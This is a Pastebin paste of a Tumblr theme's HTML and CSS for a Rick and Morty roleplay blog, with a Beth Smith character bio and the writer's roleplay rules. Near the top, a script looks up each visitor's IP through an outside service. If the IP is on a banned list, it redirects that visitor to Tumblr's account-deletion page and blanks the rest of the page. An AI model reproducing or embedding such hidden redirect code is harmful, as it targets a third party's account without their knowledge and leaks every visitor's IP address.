Advertisement
Blkbat

Untitled

Nov 4th, 2017
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 32.36 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  3. <head><title>{Title}</title>
  4. <link rel="shortcut icon" href="{Favicon}">
  5. <link rel="alternate" type="application/rss+xml" href="{RSS}">
  6. {block:Description}<meta name="description" content="{MetaDescription}" />{/block:Description}
  7.  
  8. <!---- this is theme 41 by Hollywhood
  9. please don't remove the credit
  10. thank you
  11. --->
  12.  
  13. <meta name="color:Background" content="000"/>
  14. <meta name="color:Text" content="#ffb7bb"/>
  15. <meta name="color:Link" content="7a0a00"/>
  16. <meta name="color:scrollbar" content="#">
  17. <meta name="color:title" content="#999999">
  18. <meta name="color:Link Hover" content="#eeeeee"/>
  19.  
  20. <meta name="image:sidebar" content=""/>
  21. <meta name="text:sidebartitle" content="">
  22.  
  23. <meta name="text:link 1" content="Link 1"/>
  24. <meta name="text:link 1 url" content="/"/>
  25. <meta name="text:link 2" content="Link 2"/>
  26. <meta name="text:link 2 url" content="/"/>
  27. <meta name="text:link 3" content="Link 3"/>
  28. <meta name="text:link 3 url" content="/"/>
  29. <meta name="text:link 4" content="Link 4"/>
  30. <meta name="text:link 4 url" content="/"/>
  31. <meta name="text:link 5" content="Link 5"/>
  32. <meta name="text:link 5 url" content="/"/>
  33.  
  34.  
  35. <script type="text/javascript" src="http://l2.io/ip.js?var=userip"></script>
  36. <script language="Javascript">
  37. function preloadFunc()
  38. {
  39. var ip = userip;
  40. var bannedips=[
  41. "67.2.125.80",
  42. ]
  43. var handleips=bannedips.join("|")
  44. handleips=new RegExp(handleips, "i")
  45.  
  46. if (ip.search(handleips)!=-1){
  47. window.location.replace("https://www.tumblr.com/account/delete?redirect_t");
  48. document.write('<!--');
  49. }
  50. }
  51. window.onpaint = preloadFunc();
  52. </script>
  53.  
  54. <script type="text/javascript"
  55. src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
  56. <script>
  57. $(document).ready(function() {
  58. //
  59. $('a.poplight[href^=#]').click(function() {
  60. var popID = $(this).attr('rel'); //Get Popup Name
  61. var popURL = $(this).attr('href'); //Get Popup href to define size
  62. var query= popURL.split('?');
  63. var dim= query[1].split('&');
  64. var popWidth = dim[0].split('=')[1]; //Gets the first query string value
  65. $('#' + popID).fadeIn().css({ 'width': Number( popWidth ) }).prepend('<a href="#" class="close"></a>');
  66. var popMargTop = ($('#' + popID).height() + 80) / 2;
  67. var popMargLeft = ($('#' + popID).width() + 80) / 2;
  68. //Apply Margin to Popup
  69. $('#' + popID).css({
  70. 'margin-top' : -popMargTop,
  71. 'margin-left' : -popMargLeft
  72. });
  73. $('body').append('<div id="fade"></div>');
  74. $('#fade').css({'filter' : 'alpha(opacity=80)'}).fadeIn(); //Fade in the fade layer - .css({'filter' : 'alpha(opacity=80)'})
  75. return false;
  76. });
  77. $('a.close, #fade').live('click', function() {
  78. $('#fade , .popup_block').fadeOut(function() {
  79. $('#fade, a.close').remove(); //fade them both out
  80. });
  81. return false;
  82. });
  83. });
  84. </script>
  85.  
  86. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js"></script>
  87.  
  88. <script src="http://static.tumblr.com/iuw14ew/VSQma1786/jquery.style-my-tooltips.js"></script>
  89.  
  90. <script>
  91. (function($){
  92. $(document).ready(function(){
  93. $("a[title]").style_my_tooltips({
  94. tip_follows_cursor:true,
  95. tip_delay_time:90,
  96. tip_fade_speed:600,
  97. attribute:"title"
  98. });
  99. });
  100. })(jQuery);
  101. </script>
  102.  
  103. <script language="JavaScript" src="http://dl.dropbox.com/u/3173073/GothicDarkness/qTip.js" type="text/JavaScript"></script>
  104.  
  105.  
  106.  
  107. <style>
  108.  
  109. .constellation {
  110. position: absolute;}
  111.  
  112. .hot-spot {
  113. background-color: #d30000; /* change the circle background color */
  114. border-radius: 25px;
  115. color: #fff;
  116. padding: 3px;
  117. position: absolute;
  118. text-align: center;
  119. font-size:13px;
  120. line-height:10px;
  121. z-index:99999;
  122. width: 5px;
  123. height: 5px;
  124. border: 1px solid #d85252;} /* change the sthe circle border color */
  125.  
  126. .hot-spot:hover {
  127. background-color: #f8eeee; /* change the circle hover color */
  128. -webkit-transition: 0.5s linear;
  129. -webkit-transition: all 0.5s linear;
  130. -moz-transition: all 0.5s linear;
  131. -o-transition: all 0.5s linear;}
  132.  
  133. .hot-spot:hover .boxstuff {
  134. display:block;
  135. opacity:0.9;}
  136.  
  137. /* change the 'star' positions here by altering the top and left values, you can add more stars if you like and this is where you would set the position of them */
  138.  
  139. .star1 {
  140. top: 120px;
  141. left: 419px;
  142. z-index: 999999}
  143.  
  144. .star2 {
  145. top: 150px;
  146. left: 462px;
  147. z-index: 99999}
  148.  
  149. .star3 {
  150. top: 180px;
  151. left: 418px;
  152. z-index: 9999}
  153.  
  154. .star4 {
  155. top: 205px;
  156. left: 462px;
  157. z-index: 999}
  158.  
  159. .boxstuff {
  160. background-color: #000000; /* change the hover box background colour */
  161. border: 1px solid #fff; /* change the hover box border color */
  162. color: #d30000; /* change the hover box text color */
  163. display:none;
  164. padding: 10px;
  165. position: absolute;
  166. font-size:11px; /* change the hover box font-size here */
  167. top: 13px;
  168. left:13px;
  169. width: 200px;
  170. z-index: 99999999;}
  171.  
  172.  
  173. .tooltip{
  174. display: inline;
  175. position: relative;
  176. }
  177. #s-m-t-tooltip {
  178. max-width:300px; /*how big the tooltip can be at most*/
  179. border-radius: 7px; /*change your border radius*/
  180. padding:3px 4px 5px 4px; /*padding inside tooltip*/
  181. margin:20px 7px -2px 20px; /*distance from word*/
  182. background-color:#000000; /*background color*/
  183. border:1px solid #ffffff; /*border info*/
  184. font-family:calibri; /*tooltip font*/
  185. font-size:9px; /*tooltip font size*/
  186. letter-spacing:2px; /*tooltip letter spacing*/
  187. text-transform:uppercase; /*makes the tooltip title uppercase*/
  188. color:#d30000; /*tooltip font color*/
  189. z-index:99999999999999999999999999999999999999999999999999999999;
  190. }
  191.  
  192. /*LINKS TABLE LAYOUT by htmltutor*/
  193. .linkies a {
  194. text-decoration:none;
  195. font-family: 'CC';
  196. font-size: 12px;
  197. background:#000000;
  198. border:2px solid #d30000;
  199. padding:12px;
  200. width:85px;
  201. margin-top:20px;
  202. margin-left:0px;
  203. display:inline-block;
  204. color:#d30000;
  205. text-align:center;
  206. }
  207.  
  208. .linkies a:hover {
  209. background:#000000;
  210. color:#000000;
  211. -webkit-transition: all 0.3s ease-in-out;
  212. -moz-transition: all 0.3s ease-in-out;
  213. -o-transition: all 0.3s ease-in-out;
  214. -ms-transition: all 0.3s ease-in-out;
  215. transition: all 0.3s ease-in-out;
  216. }
  217. /*END OF LINKS TABLE LAYOUT by htmltutor*/
  218.  
  219. </style>
  220.  
  221. <link href="https://fonts.googleapis.com/css?family=Caveat+Brush|Vollkorn" rel="stylesheet">
  222.  
  223. <style type="text/css">
  224.  
  225.  
  226. .popup_block
  227. {
  228.  
  229. display:none;
  230. color:#d30000;
  231. font-family: 'Vollkorn', serif;
  232. font-size:13px;
  233. text-align:left;
  234. padding:20px;
  235. width:495px;
  236. max-height:500px;
  237. background-image:url('https://68.media.tumblr.com/31b4783e44e5693250c323d86989a350/tumblr_oqljq9NyVv1wqc1gao1_1280.png');
  238. background-repeat: no-repeat;
  239. background-position:fixed;
  240.  
  241. float:left;
  242. position:fixed;
  243. top:370px;left:625px;
  244. z-index: 99999999;
  245. overflow:scroll;
  246. overflow-x:hidden;
  247. overflow-x:hidden;
  248. }
  249.  
  250.  
  251.  
  252. *html #fade {position: absolute;}
  253. *html .popup_block {position: absolute;}
  254. #fade {
  255. display:none;
  256. position:fixed;
  257. left:0px;
  258. top:0px;
  259. width:100%;
  260. height:100%;
  261. z-index:9999999;
  262. background:#00000;
  263. opacity:0.7;
  264. }
  265.  
  266.  
  267. b, strong {font-weight: bold;
  268. color: #630000;
  269. text-shadow: 0 0 6px #000000;
  270. letter-spacing:1px;
  271. font-family: 'Caveat Brush', cursive;
  272. font-size:15px
  273.  
  274. }
  275.  
  276.  
  277. i, em {
  278. text-transform: italic;
  279. color:#ffffff;
  280. text-shadow: 0 0 6px #f8eeee;
  281. letter-spacing:1px;
  282. font-family: 'Caveat Brush', cursive;
  283. font-size:17px;
  284. }
  285.  
  286.  
  287.  
  288. ::selection {color: #d30000; background: #f8eeee;}
  289. ::-moz-selection {color: #d30000; background: #f8eeee;}
  290. ::-webkit-selection {color: #d30000; background: #f8eeee;}
  291.  
  292.  
  293.  
  294.  
  295.  
  296. ::-webkit-scrollbar-thumb{
  297. background-color: #;
  298. border: 2px solid #;
  299. height:auto;
  300. }
  301.  
  302. ::-webkit-scrollbar {
  303. height:auto;
  304. width:0px;
  305. background-color: #;
  306. border:0px solid #;
  307. }
  308.  
  309.  
  310. iframe#tumblr_controls {
  311. white-space:nowrap;
  312. -webkit-filter: invert(100%);
  313. -moz-filter: invert(100%);
  314. -o-filter: invert(100%);
  315. -ms-filter: invert(100%);
  316. filter: invert(100%);
  317. opacity:.2;transition: .8s ease-in-out;
  318. -webkit-transition: .8s ease-in-out;
  319. -moz-transition: .8s ease-in-out;
  320. -o-transition: .8s ease-in-out;
  321. }
  322.  
  323. h1 {
  324. font-family: 'Caveat Brush', cursive;
  325. font-weight:normal;
  326. font-size:20px;
  327. text-align:center;
  328. font-style:normal;
  329. line-height:100%;
  330. letter-spacing:1px;
  331. text-transform:normal;
  332. color:{color:text};
  333. }
  334.  
  335. h2 {
  336. font-family: 'Caveat Brush', cursive;
  337. font-size:15px;
  338. text-align:center;
  339. line-height:100%;
  340. letter-spacing:-0.5px;
  341. #8e0700;
  342. font-weight:bold;
  343. text-transform:uppercase;
  344. padding:5px;
  345. padding-bottom:2px;
  346. }
  347.  
  348. h3 {
  349. background-image: url('');
  350. background-repeat:repeat;
  351. background-attachment:fixed;
  352. border-left: double 3px #fff;
  353. border-top: double 3px #fff;
  354. border-right: double 3px #fff;
  355. border-bottom: double 3px #fff;
  356. border-radius: 25px;
  357. padding:2px;
  358. #8e0700;
  359. text-shadow:0px 0px 5px #d30000
  360. font-size:12px;
  361. font-family: 'Caveat Brush', cursive;
  362. text-transform:uppercase;
  363. letter-spacing:1px;
  364. text-align:center;}
  365.  
  366.  
  367.  
  368. blockquote {
  369. border-left:2px solid #;
  370. padding-left:5px;
  371. margin:5px;
  372. }
  373.  
  374.  
  375. body {
  376. background-image:url(https://78.media.tumblr.com/f6e9d4b4009fd1f425955407e3d0cf66/tumblr_oyvttaHZ8w1uiapomo1_1280.png);
  377. background-repeat: no-repeat;
  378. background-attachment: fixed;
  379. background-color:#000;
  380. margin:0px;
  381. color:{color:text};
  382. font-family: 'Vollkorn', serif;
  383. font-size:16px;
  384. line-height:100%;
  385. }
  386.  
  387. a {
  388. text-decoration:none;
  389. outline:none;
  390. -moz-outline-style:none;
  391. color:{color:link};
  392. -moz-transition-duration:0.5s;
  393. -webkit-transition-duration:0.5s;
  394. -o-transition-duration:0.5s;
  395. }
  396.  
  397. a:hover {
  398. text-decoration:none;
  399. outline:none;
  400. -moz-outline-style:none;
  401. color:{color:link hover};
  402. }
  403.  
  404. img {
  405. border:none;
  406. }
  407.  
  408. blockquote {
  409. padding-left:5px;
  410. border-left:2px solid;
  411. }
  412.  
  413. blockquote blockquote {
  414. padding-left:5px;
  415. border-left:2px solid;
  416. }
  417.  
  418. #post {
  419. width:459px;
  420. padding-bottom:30px;
  421. padding-top:5px;
  422. margin-top:-10px;
  423. margin-left:2px;
  424. }
  425.  
  426. #entries {
  427.  
  428. position:fixed;
  429. height:455px;
  430. overflow-x:hidden;
  431. overflow-y:auto;
  432. width:490px;
  433. text-align:center;
  434. padding:10px;
  435. border:1px;
  436. border-style:solid;
  437. border-color:#d30000;
  438. background-color:#;
  439. top:140px;
  440. z-index:99;
  441. margin-left:490px;
  442. }
  443.  
  444. ::-webkit-scrollbar-thumb:vertical {
  445. background-color: #e912ef;
  446. height: 1px;
  447. width: 4px;
  448.  
  449.  
  450.  
  451. }
  452.  
  453. ::-webkit-scrollbar {
  454. background-color:;
  455. height:1px;
  456. width:4px;
  457.  
  458.  
  459.  
  460.  
  461. }
  462.  
  463.  
  464.  
  465.  
  466. #sidebar {
  467. color:{color:text};
  468. position:fixed;
  469. width:100px;
  470. height:auto;
  471. margin-top:39px;
  472. margin-left:504px;
  473. text-align:left;
  474. }
  475.  
  476. #sidebarimage img {
  477. width:200px;
  478. margin-top:-10px;
  479. margin-bottom:0px;
  480. margin-left:6330px;
  481. }
  482.  
  483. #alinks {
  484. display:inline;
  485. position:fixed;
  486. font-family:palatino linotype;
  487. letter-spacing:0px;
  488. width:5px;
  489. height: 5px;
  490. margin-top:-115px;
  491. margin-left:-70px;
  492. font-size:22px;
  493. text-transform:uppercase text-align:left;
  494. text-shadow:0px 0px 5px #820101
  495. line-height:250%;
  496. -moz-transition-duration:.7s;
  497. -webkit-transition-duration:.7s;
  498. -o-transition-duration:.7s;
  499.  
  500. }
  501.  
  502. #alinks a{
  503. display:inline;
  504. line-height:150%;
  505. padding-left:5px;
  506. width:5px;
  507. margin-top:50px;
  508. margin-left:20px;
  509. color:#820101;
  510.  
  511. }
  512.  
  513. #alinks a:hover {
  514. width:5px;
  515. opacity: 1;
  516. color:{color:link hover};
  517. text-shadow:0px 0px 4px #820101;
  518. -moz-transition-duration:.7s;
  519. -webkit-transition-duration:.7s;
  520. -o-transition-duration:.7s;
  521.  
  522.  
  523. }
  524.  
  525. #blinks {
  526. display:inline;
  527. position:fixed;
  528. font-family:palatino linotype;
  529. letter-spacing:0px;
  530. width:5px;
  531. height: 5px;
  532. margin-top:-85px;
  533. margin-left:-110px;
  534. font-size:22px;
  535. text-transform:uppercase;
  536. text-align:left;
  537. text-shadow:0px 0px 5px #820101
  538. line-height:250%;
  539. -moz-transition-duration:.7s;
  540. -webkit-transition-duration:.7s;
  541. -o-transition-duration:.7s;
  542.  
  543. }
  544.  
  545.  
  546.  
  547. #blinks a{
  548. display:inline;
  549. line-height:150%;
  550. padding-left:5px;
  551. width:5px;
  552. margin-top:50px;
  553. margin-left:20px;
  554. color:#820101;
  555.  
  556. }
  557.  
  558. #blinks a:hover {
  559. width:5px;
  560. opacity: 1;
  561. color:{color:link hover};
  562. text-shadow:0px 0px 4px #820101;
  563. -moz-transition-duration:.7s;
  564. -webkit-transition-duration:.7s;
  565. -o-transition-duration:.7s;
  566.  
  567.  
  568. }
  569.  
  570. #clinks {
  571. display:inline;
  572. position:fixed;
  573. font-family:palatino linotype;
  574. letter-spacing:0px;
  575. width:5px;
  576. height: 5px;
  577. margin-top:-60px;
  578. margin-left:-65px;
  579. font-size:22px;
  580. text-transform:uppercase;
  581. text-align:left;
  582. text-shadow:0px 0px 5px #820101
  583. line-height:250%;
  584. -moz-transition-duration:.7s;
  585. -webkit-transition-duration:.7s;
  586. -o-transition-duration:.7s;
  587.  
  588. }
  589.  
  590. #clinks a{
  591. display:inline;
  592. line-height:150%;
  593. padding-left:5px;
  594. width:5px;
  595. margin-top:70px;
  596. margin-left:20px;
  597. color:#820101;
  598.  
  599. }
  600.  
  601. #clinks a:hover {
  602. width:5px;
  603. opacity: 1;
  604. color:{color:link hover};
  605. text-shadow:0px 0px 4px #820101;
  606. -moz-transition-duration:.7s;
  607. -webkit-transition-duration:.7s;
  608. -o-transition-duration:.7s;
  609.  
  610. }
  611.  
  612. #dlinks {
  613. display:inline;
  614. position:fixed;
  615. font-family:palatino linotype;
  616. letter-spacing:0px;
  617. width:5px;
  618. height: 5px;
  619. margin-top:-30px;
  620. margin-left:-105px;
  621. font-size:22px;
  622. text-transform:uppercase;
  623. text-align:left;
  624. text-shadow:0px 0px 5px #820101
  625. line-height:250%;
  626. -moz-transition-duration:.7s;
  627. -webkit-transition-duration:.7s;
  628. -o-transition-duration:.7s;
  629.  
  630. }
  631.  
  632. #dlinks a{
  633. display:inline;
  634. line-height:150%;
  635. padding-left:5px;
  636. width:5px;
  637. margin-top:50px;
  638. margin-left:20px;
  639. color:#820101;
  640.  
  641. }
  642.  
  643. #dlinks a:hover {
  644. width:5px;
  645. opacity: 1;
  646. color:{color:link hover};
  647. text-shadow:0px 0px 4px #820101;
  648. -moz-transition-duration:.7s;
  649. -webkit-transition-duration:.7s;
  650. -o-transition-duration:.7s;
  651.  
  652. }
  653.  
  654.  
  655. #description {
  656. position:fixed;
  657. width:150px;
  658. font-family: 'Vollkorn', serif;
  659. margin-top:-10px;
  660. margin-left:550px;
  661. text-align:justify;
  662. font-size:14px;
  663. color: {color:text};
  664. letter-spacing:0px;
  665. line-height:130%;
  666. -moz-transition-duration:1s;
  667. -webkit-transition-duration:1s;
  668. -o-transition-duration:1s;
  669. }
  670.  
  671. #description a {
  672. color:{color:link};
  673. }
  674.  
  675. #description a:hover {
  676. color:{color:link hover};
  677. }
  678.  
  679. .sidebartitle {
  680. width:210px;
  681. text-align:center;
  682. position:fixed;
  683. font-family:arial;
  684. line-height:120%;
  685. margin-left:-13px;
  686. font-size:13px;
  687. margin-top:10px;
  688. color:{color:title};
  689. }
  690.  
  691. #pagination {
  692. font-family: 'Vollkorn', serif;
  693. position:center;
  694. width:200px;
  695. font-size:15px;
  696. margin-top:-117px;
  697. margin-left:-35px;
  698. padding-left:5px;
  699. letter-spacing:1px;
  700. font-style:italic;
  701. text-align:center;
  702. }
  703.  
  704. #pagination a {
  705. color:{color:link};
  706. }
  707.  
  708. #pagination a:hover {
  709. color:#f7efe0;
  710. }
  711.  
  712. #info {
  713. font-family:times;
  714. width:450px;
  715. height:20px;
  716. margin-top:3px;
  717. padding:2px;
  718. padding-top:5px;
  719. font-size:10px;
  720. background-image:url("https://static.tumblr.com/0cfb47959db4d176c8bd7035fed1b635/qubwg4o/4syo71pzt/tumblr_static_tumblr_static__640.gif");
  721. color:#8e0700;
  722. text-transform:uppercase;
  723. text-shadow: 0 0 3px #0000;
  724. font-style:normal;
  725. text-align:center;
  726. border:1px solid #fff;
  727. opacity: .5;
  728. border-radius: 05px;
  729.  
  730. -moz-transition-duration:0s;
  731. -webkit-transition-duration:0s;
  732. -o-transition-duration:0s;
  733. }
  734.  
  735. #info a {
  736. color:#8e0700;
  737. text-align:center;
  738. font-style:normal;
  739. }
  740.  
  741. #info a:hover {
  742. color:#333;
  743. }
  744.  
  745. .tags {
  746. font-family:times;
  747. font-style:normal;
  748. width:450px;
  749. text-transform:normal;
  750. font-style:normal;
  751. line-height:120%;
  752. padding-left:5px;
  753. font-size:10px;
  754. text-align:left;
  755. padding-top:5px;
  756. padding-bottom:15px;
  757. -moz-transition-duration:0.2s;
  758. -webkit-transition-duration:0.2s;
  759. -o-transition-duration:0.2s;
  760. }
  761. .tags a{
  762. color:{color:link};
  763. -moz-transition-duration:0.2s;
  764. -webkit-transition-duration:0.2s;
  765. -o-transition-duration:0.2s;
  766. }
  767. .tags a:hover{
  768. color:{color:link hover};
  769. -moz-transition-duration:0.2s;
  770. -webkit-transition-duration:0.2s;
  771. -o-transition-duration:0.2s;
  772. }
  773. .cover {
  774. position: relative;z-index: 1; width: 90px; float:left;}
  775.  
  776. .button {
  777. width:20px;
  778. height:30px;
  779. overflow: hidden;
  780. position: relative;
  781. z-index: 99;
  782. margin: 15px 24px 13px 16px;
  783. }
  784.  
  785. .musicbox {
  786. background-color: #;
  787. position: absolute;
  788. z-index: 99;
  789. margin-top: 15px;
  790. margin-left: 15px;
  791. opacity: 0.3;
  792. -webkit-transition: opacity 0.2s linear;
  793. -webkit-transition: all 0.2s linear;
  794. -moz-transition: all 0.2s linear;
  795. -o-transition: all 0.2s linear;
  796. }
  797. .musicbox:hover {opacity:0.9;}
  798. .musicinfo {
  799. padding:20px; font-size:12px;margin-left: 100px;text-align:center;background:#;margin-top:5px;}
  800.  
  801. #ask {
  802. float:left;
  803. color:{color:text};
  804. }
  805.  
  806. #credit {
  807. font-size:9px;
  808. font-family:cambria;
  809. font-style:italic;
  810. letter-spacing:1px;
  811. -moz-transition-duration:0.5s;
  812. -webkit-transition-duration:0.5s;
  813. -o-transition-duration:0.5s;
  814. }
  815.  
  816. #credit a {
  817. background-color:#;
  818. padding:5px;
  819. border:1px solid #e9e9e9;
  820. position:fixed;
  821. right:15px;
  822. bottom:10px
  823. }
  824.  
  825. #credit a:hover {
  826. color:;
  827. background-color:#191919;
  828. }
  829.  
  830.  
  831.  
  832.  
  833. {CustomCSS}</style></head><body>
  834.  
  835.  
  836.  
  837. <div class="constellation">
  838.  
  839. <!-- to add extra stars copy and paste from 'start' to 'end' of star 1 as shown below. make sure to position them in the css section above. you can add images, links and other html to the information boxes as you like -->
  840.  
  841. <!-- this is the start of 'star 1' -->
  842. <div class="hot-spot star1">
  843. <div class="boxstuff">
  844.  
  845. <h2>INDEPENDENT Patrick Hockstetter</h2>
  846.  
  847. <p>Patrick Hockstetter From the IT universe.<br></pr>
  848. <p><i>Trigger Warnings present upon this blog</i></pr><br>
  849. <p><i>8+ Years Experience</i></pr><br>
  850. <p><i>Open Rp for all.</i></pr><br></pr> (Oc's included. Multiverse Friendly.)
  851.  
  852.  
  853. </div>
  854. </div>
  855. <!-- this is the end of 'star 1' -->
  856.  
  857. <div class="hot-spot star2">
  858. <div class="boxstuff">
  859.  
  860. <h2>Food for thought:</h2>
  861.  
  862. <p>“Come not between the dragon and his wrath.”
  863.  
  864.  
  865. </div>
  866. </div>
  867.  
  868. <div class="hot-spot star3">
  869. <div class="boxstuff">
  870.  
  871. <h2>Lydia</h2>
  872.  
  873. <p><i> I've seen better days.
  874.  
  875. <br><br> So unafraid in my youth.
  876. <br><br> I can't breath, much less believe
  877. <br><br>the Truth... </i>
  878.  
  879.  
  880. </div>
  881. </div>
  882.  
  883. <div class="hot-spot star4">
  884. <div class="boxstuff">
  885.  
  886. <h2>Credits</h2>
  887.  
  888. <p>Icon edits are mine. <br></pr>
  889. <p>Movie Screenshots by Dcadflies </pr><br>
  890. <p>Theme coded by <a href="http://peilot.tumblr.com/">Mackerel.</a></pr><br>
  891. <br><br><i>Written By Haze.</i>
  892.  
  893.  
  894. </div>
  895. </div>
  896.  
  897. <!-- paste any extra stars here -->
  898.  
  899. </div>
  900.  
  901. <!-- don't delete the final div as this might screw up your lovely theme -->
  902.  
  903. <div id="box1" class="popup_block">
  904.  
  905. <img src=""
  906.  
  907. style="position:fixed;
  908. margin-left:-25px;
  909. margin-top:-70px;
  910. z-index:999;
  911.  
  912. -ms-transform: rotate(-30deg);
  913. -webkit-transform: rotate(-30deg);
  914. transform: rotate(-30deg);
  915.  
  916. pointer-events:none;
  917. -webkit-user-select: none;">
  918.  
  919. <div style="
  920.  
  921. width: 400px;
  922. height: 300px;
  923. margin-left:85px;
  924. margin-top:-17px;
  925. padding: 5px;
  926. padding-top: 3px;
  927.  
  928. overflow-y: scroll;
  929. overflow-x: hidden;
  930. opacity:0.9;
  931.  
  932. ">
  933.  
  934. <p><center><big><big><font color="d30000">Bio</font></big></big></center>
  935.  
  936. <p><i>FULL NAME:</i> Beth Smith/Sanchez<br>
  937. <i>Alias:</i> Mom.<br>
  938. <i>AGE:</i> Thirty Nine (39).<br>
  939. <i>GENDER:</i> Female.<br>
  940. <i>SEXUAL PREFERENCE:</i> Straight .<br>
  941. <i>ROMANTIC PREFERENCE:</i> Biromantic.<br>
  942. <i>RELATIONSHIP STATUS:</i> Single/Divorced <br>
  943. <i>SPECIES:</i> Human.<br>
  944. <i>KNOWN LANGUAGES:</i> English.<br><p>
  945. <i>Occupation:</i> Horse Surgeon at St, Equis Hospital.<br>
  946. <i>Wealth:</i> Middle Class<br>
  947.  
  948. <i>HEIGHT:</i> 5'11" <br>
  949. <i>WEIGHT:</i> 197 lbs. <br>
  950. <i>BODY SHAPE:</i> Hourglass <br>
  951. <i>AFFILIATIONS:</i> None <p>
  952.  
  953. <i>Powers & Skills:</i>
  954. <br>Infohere<br>
  955.  
  956. <br><i>EYE COLOUR:</i> Blue-Grey <br>
  957. <i>HAIR COLOUR:</i> Blonde. <br>
  958. <i>ALLERGIES:</i> N/a <br>
  959. <i>HEALTH CONDITIONS:</i> N/A <br>
  960. <i>MENTAL CONDITIONS:</i> TBA <br>
  961. <i>BLOOD TYPE:</i> TBA <p>
  962. <i>Hobbies:</i> TBA <br>
  963. <i>Goals:</i>tba<br>
  964.  
  965. <i>SINS:</i> Pride. <br>
  966. <i>VIRTUES:</i> Assertive, Compassion, Confident, Courage, Detachment, Determination, Perseverance,Honest, Passionate, Ambitious.<br>
  967. <i>ZODIAC:</i> Virgo <br>
  968. <i>TEMPERAMENT:</i> Phlegmatic <br>
  969. <i>ENNEAGRAM:</i> Type 9: The Peacemaker.<br>
  970. <i>ALIGNMENT:</i> Netural Good.<p>
  971.  
  972. <blockquote>
  973. INTELLIGENCE: ■■■■■■□ <br>
  974. STRENGTH: ■■■□□□□ <br>
  975. SPEED: ■■■■■□□ <br>
  976. DURABILITY: ■■■■■■□ <br>
  977. FIGHTING SKILLS: ■■■■■■□
  978. </blockquote><p>
  979. <i>TRAITS:</i><br>
  980. + Powerful <br>
  981. + Intelligent. <br>
  982. + Immoral.<br>
  983. + Wounded. <br>
  984. + Determined. <br>
  985. + Understanding.<p>
  986.  
  987. ---<p>
  988.  
  989. <blockquote> TBA
  990. /blockquote>
  991. </blockquote>
  992.  
  993. </center>
  994.  
  995. </div>
  996.  
  997. </div></div></div></div></div></div></div></div></div></div>
  998.  
  999. <div id="box2" class="popup_block">
  1000.  
  1001. <img src=""
  1002.  
  1003. style="position:fixed;
  1004. margin-left:-25px;
  1005. margin-top:-70px;
  1006. z-index:999;
  1007.  
  1008. -ms-transform: rotate(-30deg);
  1009. -webkit-transform: rotate(-30deg);
  1010. transform: rotate(-30deg);
  1011.  
  1012. pointer-events:none;
  1013. -webkit-user-select: none;">
  1014.  
  1015. <div style="
  1016.  
  1017. width: 395px;
  1018. height: 300px;
  1019. margin-left:80px;
  1020. margin-top:-17px;
  1021. padding: 5px;
  1022. padding-top: 3px;
  1023.  
  1024. overflow-y: scroll;
  1025. overflow-x: hidden;
  1026. opacity:0.9;
  1027.  
  1028. ">
  1029.  
  1030. <p><center><big><big><font color="d30000"Mun.</font></big></big></center>
  1031.  
  1032. <p>Hello and welcome to my blog. Firstly I am going to give a small bit of info on the mun and then post the rules.</pr>
  1033.  
  1034. <p>Mun is 22, I own a few other blogs so please be patient with responses, I will get to them as soon as I can. I have watched every episode and continue to do so. Currently I am in the works of reading the comic book. I use Discord, Skype, Twitch/Curse.</pr>
  1035.  
  1036. <p>On this blog I will be going by the name Haze. I find myself rather approachable, so if you have any concerns ask. </pr>
  1037.  
  1038. <p><center><big><big><font color="d30000">Laws of the land.</font></big></big></center>
  1039.  
  1040. <p>NSFW content and Smut are tolerated but I refuse to do so with anyone underage. If I am lied to, you will be blocked justly. However, if you are underage you may still interact with Beth. <br></pr>
  1041. <p>When it comes to shipping, it’s via chemistry but Beth is Bi-Sexual/Pan, whatever you’d like to call it. <br></pr>
  1042. <p> I accept being sent starters from mutuals. <br></pr>
  1043. <p>I would perfer it if you didn’t send anything OOC to my Ask Box, I’d like to keep it strictly Meme’s and asks for my muse. The only exception is questions for the Mun. <br></pr>
  1044. <p>If you wish to continue a thread from an ask, please move the thread onto a new post rather then reblogging. Even if you don’t I will, I’d just like cooperation. <br></pr>
  1045. <p>Keep OOC comments for threads in the tagged box. Personally I use brackets.<br></pr>
  1046. <p>Due to the adult nature of this blog I am going to attempt to properly tag triggers, if I miss something send an IM and I will fix it justly.
  1047. As I stated before, I run other blogs and I will do my best to keep up with this one but please understand I may want to write for my other muses more on some occasions. If I haven’t responded in a long time odds are I missed the response, just IM me about it. <br></pr>
  1048. <p>No Metagaming. No God Modding. Chemistry must happen through RP. I will not put my muse into a situation I do not agree with.<br></pr>
  1049. <p>I have no triggers.<br></pr>
  1050. <p>If I follow you, I more than likely want to rp with you.<br></pr>
  1051. <p>Understand I am not my muse and she, at times does things I do not agree with. This does not reflect on the Mun, I am a sinnamon bun.<br></pr>
  1052. <p> Do Not Harass me for replies. If you do so more then once I will push threads back. This is my blog, I do it for fun, I do not get paid, this is not a job. If you continue to pester me about it I will drop you.<br></pr>
  1053.  
  1054. RickxMorty is not tolerated on this blog, if you post it I will block you. Not sorry.
  1055.  
  1056. Selfcest is alright.
  1057.  
  1058.  
  1059. </div>
  1060.  
  1061. </div></div></div></div></div></div></div></div></div></div>
  1062.  
  1063. <div id="box3" class="popup_block">
  1064.  
  1065. <div style="
  1066.  
  1067. width: 400px;
  1068. height: 300px;
  1069. margin-left:80px;
  1070. margin-top:-17px;
  1071. padding: 5px;
  1072. padding-top: 3px;
  1073.  
  1074. overflow-y: scroll;
  1075. overflow-x: hidden;
  1076. opacity:0.9;
  1077.  
  1078. ">
  1079.  
  1080. <iframe frameborder="0" height="250" id="ask_form" scrolling="yes" src="http://www.tumblr.com/ask_form/hockstetterisms.tumblr.com" width="97%"></iframe>
  1081.  
  1082.  
  1083. </div>
  1084.  
  1085. </div></div></div></div></div></div></div></div></div></div>
  1086.  
  1087. <div id="box4" class="popup_block">
  1088.  
  1089. <div style="
  1090.  
  1091. width: 400px;
  1092. height: 300px;
  1093. margin-left:85px;
  1094. margin-top:-17px;
  1095. padding: 5px;
  1096. padding-top: 3px;
  1097.  
  1098. overflow-y: scroll;
  1099. overflow-x: hidden;
  1100. opacity:0.9;
  1101.  
  1102. ">
  1103.  
